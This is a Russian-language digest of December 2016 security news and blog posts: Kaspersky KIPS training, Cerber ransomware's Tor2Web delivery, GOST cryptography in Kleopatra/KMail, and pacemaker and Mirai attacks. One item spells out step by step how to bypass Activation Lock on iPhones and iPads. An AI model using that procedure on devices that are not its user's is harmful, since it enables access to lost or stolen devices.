    Я же подготовил видео ролик по данному мероприятию. По информации от Лаборатории Касперского они проводят аналогичные выездные тренинги примерно за 5000$. Если вы планируете в ближайшее время заказать аналогичный тренинг или через полгода принять участие в онлайн тренинге, то настоятельно не рекомендую вам смотреть далее. Если же вы эти полгода не сможете прожить, спокойно не узнав, что такое KIPS, продолжайте смотреть и не забудьте сказать спасибо. Тренинг проходил в двух окнах: первое окно – webex конференция в которой ведущий рассказывал правила, озвучивал обще игровые события и комментировал изменения в рейтинге за последний ход. Второе окно – непосредственно интерактивный симулятор, в котором и происходила игра. Для того чтобы не раскрывать всю интригу, я не стал записывать видео с webex, вместо этого добавил комментарии от себя. Данный тренинг проходил в режиме соревнования. Всего в европейском регионе было зарегистрировано более 160 команд, так что борьба развернулась нешуточная. Так как по правилам игры, необходимо было собрать команду из 2-3 человек и коллективно обсуждать угрозы, меры защиты и возможные действия, то я объединил усилия с ещё одним практикующим специалистом.

    Могу сказать, что получилось отлично - Kaspersky Interactive Protection Simulation поможет находить общий язык между представителями разных подразделений и уровней – CISO, CIO, ИТ, ИБ и бизнесом, поможет работать в команде и повысит осведомленность в вопросах кибербезопасности.

    orig: 2016-12-02 17:38:18 / http://sborisov.blogspot.com/2016/12/kaspersky-interactive-protection.html (click post title)



    Обновки Cerber: прокси Tor2Web, редиректы Google

    С прошлой недели Cisco наблюдает кампанию, нацеленную на засев нового варианта Cerber с помощью службы перенаправления Google и прокси-сервисов Tor2Web. По данным исследовательского подразделения Talos, распространители этого криптоблокера обычно полагаются на рассылку безупречно оформленных спам-писем с вредоносным вложением.

    «Эта кампания отличается тем, что письма не содержат вложение, невелики по размеру и предельно лаконичны», — пишут исследователи в блоге. Согласно Talos, новая спам-кампания в пользу Cerber в чем-то схожа с усилиями распространителей Locky, которые предпочитают использовать скриптовые файлы для доставки этого вымогателя.

    Текущую Cerber-кампанию Talos характеризует как «потенциально новый виток эволюции методов распространения вымогательского ПО», активно использующий Tor и Дарквеб для сокрытия факта атаки и предотвращения ответных действий.

    Как обнаружили в Cisco, распространители Cerber 5.0.1 отказались от вложений и используют URL-спам. Вредоносное письмо-ловушка предлагает получателю пройти по ссылке, чтобы загрузить файл, якобы содержащий интересную для него информацию: забавное фото, детализацию заказа или транзакции, подтверждение готовности предоставить кредит.

    «Клик по гиперссылке отправляет жертву на редирект Google, перенаправляющий (браузер) на вредоносный документ Word, размещенный в Дарквебе, — поясняет Ник Бьязини (Nick Biasini) из Cisco Talos. — Поскольку для входа в Дарквеб нужен браузер Tor, авторы атаки привязали редиректы Google к прокси-сервису Tor2Web».

    Использование Tor2Web позволяет атакующим размещать свои файлы в Дарквебе, где их трудно отыскать и заблокировать. Как отметили исследователи, «использование прокси-сервисов вроде Tor2Web обеспечивает доступ к сети Tor, не требуя локальной установки Tor-клиента в систему жертвы».

    «Использование Tor мы неоднократно наблюдали у вымогательского ПО, — комментирует Бьязини. — Однако эта сеть обычно используется для C&C-коммуникаций и получения предупреждений для жертв с требованием выкупа и инструкцией по использованию кошельков Bitcoin. Новейший вариант Cerber (5.0.1) интересен для исследователей тем, что вся связанная с ним вредоносная активность размещена в Tor».

    Появление Cerber 5.0.1 не упраздняет его предыдущие воплощения и техники. По свидетельству Бьязини, основная масса представителей этого семейства распространяется традиционными методами: через эксплойт-пак RIG и вложения в спам. «Эта кампания важна тем, что сигнализирует противникам Cerber о новом этапе его эволюции», — говорит Бьязини.

    Шифровальщик Cerber знаменит прежде всего тем, что умеет излагать свои требования вслух. В дикой природе он был впервые обнаружен в феврале и на тот момент зачастую распространялся с помощью эксплойт-пака Magnitude или Nuclear. В мае наблюдатели из FireEye зафиксировали резкий рост потока Cerber-спама с ботнетов, ранее использовавшихся для раздачи банкера Dridex. В августе появилась версия Cerber, распространяемая по франшизе. «В последние несколько месяцев Cerber продолжает менять тактику и быстро эволюционирует», — констатировал Бьязини.

    По свидетельству исследователей, в документ Word, используемый в текущей Cerber-кампании, внедрен вредоносный макрос. «Если жертва откроет вредоносный документ MS Word и включит макрос, даунлоудер с помощью командного процессора Windows вызовет Powershell, и тот затем загрузит (используя Tor2Web) и исполнит целевой PE32-файл Cerber», — гласит запись Talos.

    Cerber 5.0.1 требует выкуп в размере 1,4 биткойна ($1 тыс.). Если жертва не проведет платеж в течение пяти дней, эта сумма удваивается.

    «Новейшая вредоносная кампания показала, что угрозы на основе вымогательского ПО продолжают эволюционировать и набирать силу, — пишут исследователи. — Процесс заражения со временем усложняется, авторы атак опробуют новые методы, стремясь избежать обнаружения и затруднить анализ».

    Чтобы уменьшить риски, Talos рекомендует блокировать весь трафик Tor2Web и Tor в корпоративной сети: «Организациям нужно решить, насколько необходимы для бизнеса Tor и Tor2Web и оправдывает ли их разрешение потенциальные риски для пользователей сети».

    orig: 2016-12-02 15:27:41 / https://threatpost.ru/new-cerber-variant-leverages-tor2web-proxies-google-redirects/19458/ (click post title)



    Сказание о Клеопатре и о российской криптографии (Продолжение)

    imageС появлением библиотеки GCrypt-1.7.0 с поддержкой российской криптографии (ГОСТ 28147-89, ГОСТ Р 34.11-94/2012 и ГОСТ Р 34.10-2001/2012), стало возможным говорить о поддержке российского PKI в таких проектах как Kleopatra и KMail.

    imageKMail – это почтовый клиент, который для обеспечения безопасности переписки позволяет подписывать и шифровать сообщения по протоколу S/MIME. И то и другое базируется на архитектуре PKI, сертификатах X509 и протоколах CMS/PKCS#7:

    image

    imageKleopatpa – это графическая утилита, которая не только позволяет подписывать и шифровать файлы, но и обеспечивает хранение и управление сертификатами и закрытыми ключами:

    image

    imageИ Kleopatpa и KMail не имеют встроенной криптографии: все криптографические преобразования для них делает их свита и прежде всего модуль gpgsm из пакета GnuPg. Для криптографических вычислений используется библиотека LibGCrypt. А для разбора сертификатов X509, подписанных или зашифрованных сообщений (CMS/PKCS#7, PKCS#10 и т.п.) используется библиотека libksba. Упомянем еще библиотеку libgpgme, но о ее роли чуть позже.

    И если сама Kleopatpa и ее верный слуга KMail ничего против российской криптографии не имеют, то их свита, за исключением LibGCrypt, наотрез отказывается с ней дружить.

    Начнем с самого безобидного члена свиты, а именно с библиотеки libgpgme. Для начала посмотрим исходный код подписанного сообщения:

    image

    В поле «Content-Type» есть переменная micalg, в которой указывается тип хэша, используемого при формировании или проверке подписи. Для многих почтовых клиентов, в том числе и для KMail, отсутствие значение в этом поле никак не влияет на проверку электронной подписи, но только не для Thunderbird и Seamonkey. Поэтому желательно, чтобы это поле и KMail-ом заполнялось. Тем более, что для этого потребуются минимальные усилия. Все, что необходимо это добавить в файл gpgme.h.in номера российских хэш-алгоритмов:

    /* Hash algorithms (the values match those from libgcrypt).  */
    typedef enum
      {
        GPGME_MD_NONE          = 0,
    	.  .  .
        GPGME_MD_CRC24_RFC2440 = 304,
    /*Добавлено from gcrypt.h.in  !!!!*/
        GPGME_MD_GOSTR3411_94  = 308, /* GOST R 34.11-94 */
        GPGME_MD_STRIBOG256    = 309, /* GOST R 34.11-2012, 256 bit.  */
        GPGME_MD_STRIBOG512    = 310,  /* GOST R 34.11-2012, 512 bit.  */
        GPSME_MD_GOSTR3411_CP   = 311 , /* GOST R 34.11-94 with CryptoPro-A S-Box.  */  }
    gpgme_hash_algo_t;
    

    Причем эти номера должны строго коррелировать с соответствующими номерами из файла gcrypt.h.in библиотеки libgcrypt:
    /************************************
    *   Cryptograhic Hash Functions    		*
    ************************************/
    
    /* Algorithm IDs for the hash functions we know about. Not all of them
       are implemented. */
    enum gcry_md_algos
      {
        GCRY_MD_NONE    = 0,
        	.   .   
        GCRY_MD_TIGER2        = 307, /* TIGER2 variant.   */
    /*Российские хэш алгоритмы*/
        GCRY_MD_GOSTR3411_94  = 308, /* GOST R 34.11-94.  */
        GCRY_MD_STRIBOG256    = 309, /* GOST R 34.11-2012, 256 bit.  */
        GCRY_MD_STRIBOG512    = 310, /* GOST R 34.11-2012, 512 bit.  */
        GCRY_MD_GOSTR3411_CP  = 311, /* GOST R 34.11-94 with CryptoPro-A S-Box.  */
        	.    .   .
        GCRY_MD_SHAKE256      = 317
      };

    Вот и все, библиотека libgpgme встала на сторону российской криптографии.

    imageОсновная доработка пришлась на GnuPg (модуль gpg-protect-tool), который отвечает, в частности, за импорт личных сертификатов X509 из защищенного контейнера PKCS#12, модуль gpgsm, который в частности, отвечает за формирование и разбор сертификатов, подписанных и зашифрованных сообщений (CMS, PKCS#7) и его подмастерье библиотеку libksba.

    Риторический вопрос – где взять личный сертификат, т.е. сертификат X509 и закрытый ключ? Но сегодня с этим вопросов нет, конечно в Удостоверяющем Центре (УЦ). Сегодня в России зарегистрированных только в Минкомсвязи не одна сотня УЦ. Однако надо помнить, что это услуга платная! Для тестирования (и даже внутрикорпоративного защищенного документооборота, включая почтовую переписку) личные сертификаты в защищенном контейнере PKCS#12 можно получить с помощью утилиты openssl, либо на одном из бесплатных тестовых УЦ. Здесь же можно получить личный сертификат сразу в контейнере PKCS#12.

    imageДля импорта личного сертификата в среду Клеопатры (правильнее сказать в хранилище сертификатов и закрытых ключей в GnuPg) необходимо имеющийся личный сертификат выгрузить (экспортировать) в контейнер PKCS#12. При этом может оказаться, что контейнер был сформирован в соответствии с требованиями ТК-26. В настоящее время (подчеркиваем, в настоящее время) GnuPg не ладит с контейнерами PKCS#12 сформированными по требованиям ТК-26, но это и не страшно. Имея под рукой утилиту openssl (а еще лучше утилиту lirssl), мы быстро избавляемся от этого недостатка, выпустив новый контейнер с помощью простого скрипта:

    #cat CONVERT_P12_for_GPGSM.sh
    
    # в файле /etc/ssl/openssl.cnf должен быть подкючен ГОСТ-ый engine
    export OPENSSL_CONF=/etc/ssl/openssl.cnf
    openssl pkcs12 -in $1.p12 -nodes -out $1.txt.p12 -nomacver
    openssl pkcs12 -export -in $1.txt.p12 -nodes -out $1\_openssl_cert_key.p12
    rm –f 	$1.txt.p12
    echo "Файл для импорта в GPGSM: $1\_openssl_cert_key.p12"
    #
    
    #sh CONVERT_P12_for_GPGSM.sh фт-2001-2016
    Enter Import Password:
    Enter Export Password:
    Verifying - Enter Export Password:
    Файл для импорта в GPGSM: фт-2001-2016_openssl_cert_key.p12
    #

    Теперь у нас есть контейнер PKCS#12, который мы и будем импортировать:

    image

    После нажатия кнопки «Открыть» будет предложено ввести пароль для разбора контейнера PKCS#12:

    image

    А затем будет предложено ввести и подтвердить пароль, по которому будет осуществляться доступ к закрытому ключу импортированного сертификата:

    image

    Все, личный сертификат импортирован. Сторонние сертификаты, а также корневые сертификаты, импортируются как из формата DER, так и формата PEM.

    Теперь, когда Kleopatra владеет сертификатами, она может своим личным сертификатом подписывать документы:

    image

    вводя пароль для доступа к закрытому ключу:

    image

    Конфиденциальные файлы теперь можно шифровать с использованием сертификата получателя:

    image

    При создании CMC/PKCS#7 с шифрованием для формирования ключа шифрования ключей (КЕК) с помощью закрытого ключа, соответствующего ключу originatorKey publicKey, и открытому ключу получателя, применяется алгоритм VKO GOST R 34.10-2012. К сожалению, в текущей версии GCrypt отсутствует реализация данного алгоритма. Реализация данного алгоритма была заимствована из библиотеки LCC-2016 и добавлена в файл ecc-gost.c.

    И так, смело нажимаем кнопку «Продолжить»:

    image

    Что касается почтового клиента KMail, то для того, чтобы защитить переписку (электронная подпись, шифрование), прежде всего надо выбрать личный сертификат (сертификат, у которого есть закрытый ключ), которым вы будете подписывать почтовые сообщения, а также сертификат, который будет участвовать в шифровании писем:

    image

    Нажмите кнопку «Запустить диспетчер сертификатов»: к вашим услугам будет Клеопатра и вы сможете подробно просмотреть свойства выбираемого сертификата.

    Теперь можно как подписывать, так и шифровать почтовые сообщения:

    image

    После нажатия «Отправить» KMail запросит подтвердить факт шифрования:

    image

    И запросит ввести пароль для доступа к закрытому ключу:

    image

    imageНо хочется большего. Речь идет об использовании программно-аппаратных токенов PKCS#11 с поддержкой все той же российской криптографии. Для подключения тоненов PKCS#11 необходимо установить в систему доработанный модуль gnu-pkcs11-scd, а в конфигурационный файл gpg-agent.conf добавить следующие строки:

    scdaemon-program /usr/local/bin64/gnupg-pkcs11-scd
    pinentry-program /usr/bin/pinentry-qt
    

    После этого необходимо в конфигурационном файле gnu-pkcs11-scd.conf указать библиотеки PKCS#11 для токенов, которые будут использоваться:
    #В примере предполагается использование программно-аппаратного токена #LS11USB2016
    #с библиотекой /usr/local/lib64/libls11usb2016.so
    …
    # Comma-separated list of available provider names. Then set
    # attributes for each provider using the provider-[name]-attribute
    # syntax.
    providers libls11usb2016
    provider-libls11usb2016-library /usr/local/lib64/libls11usb2016.so
    provider-libls11usb2016-cert-private
    …
    
    

    Убедитесь, что gpg-agent запущен:
    $ gpg-agent --daemon --use-standard-socket
    GPG_AGENT_INFO=/home/a513/.gnupg/S.gpg-agent:19092:1; export GPG_AGENT_INFO;
    $

    Теперь после запуска Kleopatra или KMail, будет запрошен PIN-код для доступа к токену:

    image

    Проверить имя токена, можно воспользовавшись свободно распространяемой утилитой p11conf :

    $ /usr/local/bin64/p11conf  -A /usr/local/lib64/libls11usb2016.so -h
    usage:  /usr/local/bin64/p11conf [-hitsmIupPred] -A APIpath [-c slotID -U userPin -S SOPin -n newPin -L label]
            -h display usage
            -i display PKCS#11 library info
            -s display slot(s) info (-c slotID is optional)
            -t display token(s) info (-c slotID is optional)
    Others must use -c slotID
            -m display mechanism list
            -I initialize token 
            -u initialize user PIN
            -p set the user PIN
            -P set the SO PIN
            -r remove all objects
            -e enumerate objects
            -d dump all object attributes
    Copyright(C) 2011-2016
    bash-4.3$

    Для просмотра импормации о токене достаточно выполнить следующую команду:

    image

    После успешного ввода PIN-кода, будет получен весь список сертификатов, как из хранилища GnuGPG, так и хранящихся на подключенных токенах/смарт-картах PKCS#11:

    image

    Более того, теперь использовать российскую криптографию в S/MIME для подписания и шифрования переписки могут использовать и другие почтовые клиенты (например, Claws, Evolution), которые используют для этого мехамизмы GnuPg/SMIME:

    image

    image

    imageВот и все – Kleopatra и ее королевская свита добросовестно служат российской криптографии!

    Что дальше?

    imageА дальше надеемся, что в ближней перспективе Kleopatra также будет формировать запросы PKCS#10 для ГОСТ Р 34,10-2001/2012:

    image
    которые затем можно будет передавать в Удостоверяющие Центры и в итоге получать сертификаты.

    Но это будет другой сказ.

    orig: 2016-12-02 13:58:36 / https://habrahabr.ru/post/316736/ (click post title)



    Куда идет ИТ-аутсорсинг?

    orig: 2016-12-02 13:27:15 / http://www.jetinfo.ru/news/?nid=56704c83c070940007f99ee797c280f7 (click post title)



    Кардиостимуляторы могут взломать даже неопытные хакеры

    Имплантируемые медицинские устройства часто используют незащищенные протоколы коммуникации.

    Незащищенные кардиостимуляторы и имплантируемые кардиовертеры-дефибрилляторы (ИКД) могут взломать даже неопытные хакеры с ограниченными ресурсами. К такому выводу пришли специалисты исследовательской группы ESAT-COSIC and iMinds и Бирмингемского университета в ходе проведенного исследования.

    Эксперты использовали недорогое оборудование для реверс-инжиниринга коммуникационных протоколов, используемых устройствами. Как пояснили специалисты, имплантируемые медицинские устройства часто используют незащищенные или слабо защищенные проприетарные протоколы для беспроводной коммуникации с программатором.

    В ходе анализа специалисты выявили ряд уязвимостей в протоколах и их реализации. В результате, исследователям удалось активировать ИКД путем обхода текущей процедуры активации, перехватить и модифицировать данные, а также отправить вредоносные инструкции на устройство.

    Выявленные экспертами уязвимости затрагивают по меньшей мере 10 типов ИПК, представленных на рынке (названия торговых марок не разглашаются).

    Эксплуатация проблем позволила исследователям собирать информацию о состоянии здоровья пациентов, их лечении, осуществить DoS-атаки на устройства, а также отправлять произвольные команды. Как отмечается, для успешной компрометации девайса злоумышленнику не обязательно находиться вблизи - все вышеуказанные атаки работают на расстоянии от 2 до 5 метров.

    orig: 2016-12-02 12:30:44 / http://www.securitylab.ru/news/484633.php (click post title)



    Amazon будет перевозить данные клиентов в грузовиках

    Перевозка данных в грузовиках займет меньше времени, чем передача по интернету.

    Amazon построила одну из крупнейших в мире компьютерных сетей, однако предложенный ею способ передачи данных вызывает удивление. В ходе ежегодной конференции для клиентов в Лас-Вегасе представители компании сообщили о планах использовать для доставки информации из дата-центров в свое облачное хранилище грузовики.

    Как считают в Amazon, скорость передачи данных по интернету недостаточно высокая, и быстрее будет воспользоваться грузовой машиной. Непосредственно в выставочном зале, где проходила конференция, был представлен специальный грузовик Snowmobile, способный вместить 5 петабайт информации.

    Машина будет подъезжать к офисам клиентов, забирать данные и отвозить их прямиком в Amazon, где они будут загружаться в облачное хранилище Amazon Web Services (AWS). Весь процесс займет намного меньше времени, чем если бы информация передавалась с помощью интернета, сообщает The Wall Street Journal. Десять Snowmobile смогут перевезти один эксабайт информации меньше, чем за 6 месяцев. Передача такого количества данных с помощью Сети заняла бы около 26 лет.

    Стоимость грузовиков не раскрывается. Тем не менее, по словам главы AWS Энди Джесси (Andy Jassy), в распоряжении компании уже есть несколько Snowmobile, используемых клиентами.

    orig: 2016-12-02 12:15:43 / http://www.securitylab.ru/news/484632.php (click post title)



    Волгоградский кибермошенник вымогал деньги от имени ФСБ

    Преступник блокировал компьютеры жертв якобы за просмотр порнографии и требовал выкуп за разблокировку.

    Сотрудники правоохранительных органов задержали мужчину и женщину, выдававших себя за служащих силовых структур (МВД, ФСБ и ФССП) с целью вымогательства денег. Об этом в пятницу, 2 декабря, сообщает издание «РИА Новости» со ссылкой на официального представителя Министерства внутренних дел РФ Ирину Волк.

    По данным МВД, преступники, которыми оказались скрывающиеся в Таиланде жители Волгограда, с помощью вредоносных скриптов блокировали компьютеры пользователей якобы за просмотр порнографического контента и от имени российских правоохранительных органов требовали выкуп за разблокировку.

    Источники незаконной прибыли были перекрыты, из-за чего организатор мошеннической схемы вернулся в Россию. Как сообщила Волк, правоохранители задержали преступника в аэропорту «Домодедово». Мошенник признал свою вину и добровольно согласился предоставить все используемое в преступных целях оборудование. Сейчас преступник и его помощница находятся под домашним арестом.

    orig: 2016-12-02 11:27:19 / http://www.securitylab.ru/news/484630.php (click post title)



    Обнаружен способ обхода экрана активации iPhone и iPad

    Уязвимость в iOS позволяет обойти функцию Activation Lock и получить полный доступ к устройству.

    Эксперт по безопасности Хэмент Джозеф (Hemant Joseph) обнаружил уязвимость, позволяющую обойти функцию Activation Lock на iPhone и iPad и получить полный доступ к устройству. Проблема затрагивает актуальные версии мобильной операционной системы iOS - 10.1 и 10.1.1, сообщает SecurityWeek.

    Функция Activation Lock предназначена для предотвращения несанкционированного доступа к iPhone и iPad в случае потери или кражи гаджета. Для отмены блокировки Activation Lock необходимо ввести данные учетной записи Apple ID владельца устройства.

    Опция «Найти iPhone» (Find My iPhone) позволяет активировать режим потери (Lost Mode) на iPhone, iPad или iPod в случае кражи или утери устройства. В режиме потери функция Activation Lock включается автоматически, предотвращая реактивацию устройства без разрешения владельца.

    Джозефу удалось обойти экран активации на iPad при помощи довольно простого метода. Во время активации, на экране выбора сети Wi-Fi исследователь выбрал пункт «Другая сеть» и указал в полях «Название», «Логин» и «Пароль» большое количество символов, после чего перевернул устройство из горизонтального режима в вертикальный. Переполнение буфера при смене ориентации привело к зависанию iPad, а закрытие и открытие чехла Smart Cover позволило вызвать сбой в работе и получить полный доступ к главному экрану гаджета.

    По словам Джозефа, данный метод работает на устройствах под управлением iOS 10.1. Как утверждает эксперт, Apple якобы устранила уязвимость в iOS 10.1.1. Тем не менее, похожий метод обхода блокировки работает и на устройствах на базе данной версии ОС. Эксперты компании Vulnerability Lab опубликовали видео с демонстрацией обхода активации iPad при помощи функции поворота экрана и Ночного режима. На видео исследователям удалось получить доступ к главному экрану устройства всего на секунду, но, по словам основателя Vulnerability Lab Бенджамина Кунц-Межри (Benjamin Kunz-Mejri), доступ можно продлить путем быстрого нажатия на кнопку питания iPad. Данный метод также работает на iPhone.

    orig: 2016-12-02 11:21:28 / http://www.securitylab.ru/news/484631.php (click post title)



    Ненависти пост: Самопроизвольное открытие вкладок

    Недавно я начал жизнь заново снес винду, которая стояла 4 года. Решил, что на компе буду только писать, смотреть фильмы и экспериментировать с eye-trackerом. Установил Firefox и приложение для rutracker, savefromnet, драйвера для eye-trackerа, а так же бесплатную скнировалку от Касперского.

    Мерзкий mail.ru как-то пробрался в браузер (горите в аду), но за 15 минут гугления я его выковырял отовсюду. Но тут бац, и каждые 22 минуты у меня стала самопроизвольно открываться новая вкладка с «вулканом» и прочей фигней. Особенно прикольно видеть комп после сна, с 2 десятками пестрящих страниц спама.

    Антивирус молчит. На браузере сбросил настройки, а потом и вовсе переустановил, ярлык браузера на наличие параметров запуска проверил.

    Я полез в сеть за поиском best practice, но ничего толкового не нашел. Либо советовали запустить специальный скрипт, либо чекать ярлык для браузера. Да, и вот «касперские» что-то на форуме советовали непонятное (Kaspersky Lab Forum: Браузер сам открывает рекламные вкладки). Промучился 2 дня. Даже делал «Завершение работы» на ночь.

    Сходил посмотреть фильм про Кусто и меня осенило.

    Вспомнил, что еще в эпоху карточек РОЛ-50 с бесплатной анлимитной ночью, я так сумел настроить запуск программ по расписанию, чтобы комп сам качал тонны порно музыки по ночам. Надо проверить. Минут 10 искал в новой винде, где прячется планировщик. Попался!

    Инструкция по шагам
    Шаг 0. Проклянуть всех, кто причастен к мерзкому нарушению прав и навязыванию своих стартовых страниц, поиска, приложений. (Это относится к отдельным грешникам из Яндекс, Маил.ру и «Вулкан». Для вас приготовлено место в «особенном аду».)image

    Шаг 1. Заходим «Панель управления» -> «Администрирование»

    Шаг 2. Клацаем на «Планировщик заданий»

    Шаг 3. Слева заходим в подраздел «Библиотека планировщика» и находим «InternetBC»

    Шаг 4. Вырываем печень врагу и съедаем

    Кто знает, какая софтина бережет от подобной фигни, напишите плиз.

    P.S.
    При написании статьи самопроизвольно открылись 2 вкладки. Готов закинуть 1000 рублей, чтобы у тех людей, кто пишет подобные легальные «встраивалки» отвалились кулеры.

    orig: 2016-12-02 11:04:48 / https://habrahabr.ru/post/316718/ (click post title)



    В РФ предлагают установить единые требования к способам блокировки сайтов

    В настоящее время операторы связи самостоятельно выбирают способы ограничения доступа к интернет-ресурсам.

    Министерство связи и массовых коммуникаций РФ предлагает определить единые требования для всех операторов связи к способам блокировки сайтов. Уведомление о внесении соответствующих поправок в Федеральный закон «Об информации, информационных технологиях и о защите информации» размещено на портале федеральных нормативных правовых актов.

    Как указывается в уведомлении, в настоящее время операторы связи по своему усмотрению выбирают способы ограничения доступа к интернет-ресурсам. В ряде случаев выбранные методы не всегда являются оптимальными с точки зрения сохранения устойчивости сетей связи. В результате могут блокироваться сайты, не содержащие противоправную информацию.

    В этой связи возникает необходимость унифицировать и определить единые требования для всех операторов связи к способам ограничения доступа к интернет-ресурсам, а также сообщением о блокировке доступа к сайтам, отмечается в уведомлении.

    Планируется, что новый закон вступит в силу в сентябре 2017 года.

    В настоящее время закон предусматривает три метода блокировки сайтов - по URL, IP-адресу и доменному имени, отмечает «РИА Новости». В первом случае блокируется конкретная страница, содержащая запрещенную информацию. Применение остальных методов влечет ограничение доступа ко всему ресурсу, а также к другим сайтам, находящимся на том же адресе. Не все операторы имеют возможность блокировать доступ по URL, поскольку для этого требуется дорогостоящее оборудование.

    orig: 2016-12-02 10:05:42 / http://www.securitylab.ru/news/484629.php (click post title)



    Онлайн-варианты ИБ-игры KIPS от Лаборатории Касперского

    Прошлый четверг был не только рыбным днем; он был насыщен и событиями по безопасности, среди которых я бы отметил опубликования Cisco пресс-релиза о получении сертификата на отсутствие НДВ, конференцию AntiFraud Russia, где я читал презентацию по модели угроз биометрическим системам, и выступление Президента, где он призвал снижать барьеры для компаний в области ИБ (правда его же распоряжение об ужесточении лицензионного контроля немного противоречит словам из Послания). Но было и еще одно событие, которому я и хотел посвятить эту заметку. Речь о кибермундиале, то есть чемпионате по онлайн-игре Kaspersky Industrial Protection Simulation, о которой я писал год назад и которая тогда была преимущественно "бумажной".
    В прошлый раз я высказал идею, что было бы замечательно, если бы игра стала целиком онлайн и вот свершилось. Коллеги из Лаборатории Касперского пригласили меня поучаствовать в чемпионате, в котором приняло участие около 400 команд из разных регионов мира. Поэтому чемпионат разделили на 3 блока, проходящие в разные временные отрезки. Учитывая AntiFraud, я попал только на североамериканский чемпионат, где участвовало 40 команд.

    Я не ставил перед собой задачи выиграть - мне было интересно, что получилось из бумажного варианта, который я видел больше года назад. С точки зрения описанной мной в прошлый раз стратегии не поменялось ничего и повторять ее я не буду. Игровое поле тоже мало претерпело изменений - по сути автоматизировали процесс выбора карточек на каждом ходе с последующим автоматическим подсчетом очков, что и позволило целиком перейти в онлайн.


    Так как речь шла о чемпионате, где необходима было обеспечить звуковое сопровождение игры, отсчет времени, комментарии и т.п., то ЛК использовала для этого наш Webex, через который был проведен предварительный тренинг по использованию игры, а после чемпионата - проведен анализ игры и даны рекомендации по отдельным шагам игроков. Этот момент был очень ценен, так как действительно позволяет не просто "поиграл и забыл", но и получить обратную связь и понять, что было правильно, а что нет.
    Иногда у меня вызывало вопросы то, как принимается решение внутри движка и почему то или иное мое действие приводит к тем или иным результатам. Такое недоумение было и в бумажной версии. По сути игра жестко запрограммирована в соответствие с видением экспертов ЛК, что, допускаю, может вступать в противоречие с мнением других экспертов. Но все равно, вариативность и зависимость между действиями, сделанными на разных ходах, была неплохой.
    Меры защиты были не только технические, но и организационные. Была учтена связь ИБ и ИТ, а также необходимость привлечения внешних компаний (пентестеров и аутсорсеров), а также обращения в правоохранительные органы :-) Достаточно интересно оказалось, что некоторые карточки не приводили к желаемому результату и похоже (хотя могу и ошибаться) были сделаны для отвлечения внимания. Например, произошедший денежный перевод не тому получателю нельзя было отозвать (так как его уже провели), хотя карточка с такой мерой была предусмотрена :-)
    Интересно, что сценарий игры подразумевал не просто борьбу с угрозами, а еще и необходимость учитывать бизнес-задачи. Например, неустраненная уязвимость Интернет-магазина могла привести к его блокированию со стороны провайдера Интернет, а обновление всех компьютеров - к потере времени сотрудников и снижению доходов компании. Целью игры было не побороть все угрозы, а обеспечить максимальный доход в условиях ограниченного бюджета и времени. На фоне ограничения времения на каждый ход, которое еще и снижалось на каждой новой итерации, это заставляло думать очень быстро.
    Новые защитные меры появлялись не сразу, а по мере хода игры, что также добавляло некоторой непредсказуемости результата. Продумываешь один сценарий, а тебя сбивают с толку новыми карточками, да еще и настойчиво рекомендуют их применить "а то будет плохо...".
    В итоге, я занял 28-е место из 40 и получил массу удовольствия. Будь это не первая игра и не надо мне было бы параллельно заниматься с детьми, я бы более внимательно отнесся к заданиям и моей реакции. Может быть и результаты были бы тогда повыше. Во время чемпионата в нашем регионе (EMEA), победитель достиг миллиона с небольшим (максимальное значение было 1.100.000).
    А теперь несколько слов о том, чего бы мне хотелось увидеть в следующей версии:
    Вот такая интересная игра, которая может стать еще лучше. Поддержка разных языков и ориентация на разные вертикалы (финансы, ритейл, промышленность, госы и т.п.) позволит данной игре стать значительным событием в мире ИБ и классным инструментом для повышения осведомленности по вопросам ИБ. Да и как средство анализа этот инструмент очень недурен при правильном подходе. Этакий аналог KSN :-)

    orig: 2016-12-02 09:22:15 / http://lukatsky.blogspot.com/2016/12/kips.html (click post title)



    Хакеры атаковали 100 тыс. клиентов британского интернет-провайдера

    Маршрутизаторы пользователей могли быть заражены новым образцом вредоносного ПО Mirai.

    Клиенты британского интернет-провайдера Talktalk Telecom Group PLC стали жертвами кибератаки. Как сообщает Reuters со ссылкой на пресс-службу компании, инцидент затронул лишь «небольшое количество пользовательских маршрутизаторов».

    «Наряду с другими интернет-провайдерами в Великобритании и за границей мы предпринимаем шаги для выяснения возможного влияния червя Mirai», - сообщила пресс-служба Talktalk.

    Согласно заявлению британской государственной компании Post Office, в воскресенье, 27 ноября, кибератаке подверглись 100 тыс. пользовательских маршрутизаторов. Напомним, в этот же день жертвами хакеров стали порядка 900 тыс. клиентов немецкой телекоммуникационной компании Deutsche Telekom. Причиной сбоя в работе маршрутизаторов оказался новый образец печально известного вредоносного ПО Mirai. По данным ИБ-экспертов из Flashpoint, вредонос инфицировал устройства не только в Германии, но также порядка в 10 странах мира, в том числе в Великобритании и Бразилии.

    Британские пользователи испытывали проблемами с доступом к интернету, однако, по заявлению компании, их данные затронуты не были. «Мы обнаружили источник проблемы и приняли меры по ее устранению», - сообщила пресс-служба, не уточнив, о каком именно источнике идет речь.

    orig: 2016-12-02 08:28:44 / http://www.securitylab.ru/news/484628.php (click post title)



    Авиаслужба Саудовской Аравии подверглась нападению хакеров

    Неизвестные провели серию кибератак на управление гражданской авиации Саудовской Аравии, хакеры также атаковали еще пять организаций, среди которых были правительственные ведомства, передает агентство Блумберг со ссылкой на источники, близкие к расследованию инцидента.

    Злоумышленники использовали вредоносную программу, которая поразила сразу множество компьютеров одной сети. Хакерам удалось уничтожить данные с нескольких тысяч компьютеров главного управления гражданской авиации, что отразилось на его работе в течение нескольких дней, но не повлияло на функционирование аэропортов страны.

    Серия кибератак была проведена за последние две недели. Власти подозревают, что к инциденту причастны хакеры, действовавшие при поддержке иностранного правительства, вероятнее всего, иранского.

    Источники утверждают, что злоумышленники использовали программу Shamoon, которую в 2012 году применили хакеры, напавшие на крупнейшую нефтяную компанию Саудовской Аравии Saudi Aramco. Тогда на устранение ущерба от атаки техническим службам понадобился почти месяц. Ответственность за нападение взяла на себя хакерская группировка Cutting Sword of Justice, объяснив свои действия несогласием с внешней политикой Саудовской Аравии, сообщает ria.ru.

    orig: 2016-12-02 08:02:19 / https://www.anti-malware.ru/news/2016-12-02/21602 (click post title)



    Иностранные спецслужбы готовили кибератаки на финансовую систему РФ

    Иностранные спецслужбы готовили масштабные кибератаки с целью дестабилизации финансовой системы России, нападения должны были начаться 5 декабря, сообщается на сайте ФСБ. В ведомстве уточнили, что атаки должны были коснуться крупнейших российских банков.

